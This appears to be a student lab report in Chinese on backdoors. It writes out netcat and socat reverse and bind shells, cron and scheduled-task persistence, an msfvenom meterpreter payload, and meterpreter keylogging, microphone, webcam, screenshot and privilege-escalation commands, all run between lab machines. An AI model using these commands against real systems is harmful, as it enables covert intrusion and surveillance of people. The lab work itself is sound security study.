基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载破解游戏,盗版电影或安装来历不明的软件,可能被留下后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win环境下可以开机自动启动,linux环境可以用corn启动。
(3)Meterpreter有哪些给你映像深刻的功能?
可以自己定制后门程序,针对不同用户不同主机不同人群。
(4)如何发现自己有系统有没有被安装后门?
杀毒软件报错,开启防火墙等防护措施。
任务一
使用ipconfig
查询win7的IP地址
进入ncat文件夹中,使用命令ncat.exe -l -p 5337
监听本机的5337端口
在kali环境中使用netcat
命令连接到Windows主机,使用netcat
命令netcat 192.168.1.101 5337 -e /bin/sh
进行连接
即可获取kali权限
任务二
使用ifconfig
查看kali的IP地址
使用nc -l -p 5337
指令监听5337端口
在Windows下,使用ncat.exe -e cmd.exe 192.168.1.154 5337
反向连接kali的5337端口
在kali下可以看到已经获得Windows权限Microsoft Windows,可以输入命令进行操作
任务三
首先在Windows下监听5337端口ncat.exe -l 5337
从kali使用netcat 192.168.1.101 5337
命令连接到Windows端口
建立连接后可以进行数据传输
任务四
在Windows系统下,使用ncat.exe -l -p 5337
监听5337端口
在kali中,使用crontab -e
指令编辑一条定时任务,输入指令后选3进入crontab编辑界面
在最后一行添加07 * * * * /bin/netcat 192.168.1.101 5337 -e /bin/sh
,在每个小时的第07分反向连接Windows主机的5337端口,然后保存退出
因为做的时候是20:05 于是我设定07启动
任务五
在win7右键我的电脑,点击管理,在任务计划程序中点击创建任务,填写任务名字并编辑触发器。
点击操作选择启动程序程序或脚本填写你自己的socat.exe程序的路径,在添加参数中填写tcp-listen:5337 exec:cmd.exe,pty,stderr
创建完成之后锁定计算机再重新启动发现程序已经在运行了
在kali虚拟机中输入socat - tcp:192.168.1.101:5337
可以发现已经成功获得了一个cmd shell
任务六
在kali上执行命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 -f exe > 20165337_backdoor.exe
这里的IP地址填写kali的IP地址,生成后门程序20165337_backdoor.exe
在Windows下进入ncat文件夹输入命令ncat.exe -lv 5337 > 20165337_backdoor.exe
,被控主机就进入了文件接收模式
在kali中输入nc 192.168.1.101 5337 < 20165337_backdoor.exe
,这里的IP为win7的IP,进行后门文件的传输
传输完成
在Kali上使用命令msfconsole
进入msf控制台
输入:use exploit/multi/handler
使用监听模块,set payload windows/meterpreter/reverse_tcp
设置payloadset LHOST 192.168.1.154
设置反弹回连的IP和端口,这里用的是kali的IPset LPORT 5337
设置反弹回连的IP和端口
输入show options
exploit
使用监听
运行Win7的后门程序
kali已经获取权限
任务七
在任务六的基础上进行
使用record_mic
指令截获一段音频,用-d选项设置录制时间
使用webcam_snap
指令可以使用摄像头进行拍照
但是win7不能调用摄像头,会出现以下界面
使用keyscan_start
开始记录下敲键的过程,使用keyscan_dump
指令读取敲键的记录
使用screenshot
命令进行截屏
使用命令getuid
查看当前用户,使用getsystem
命令提权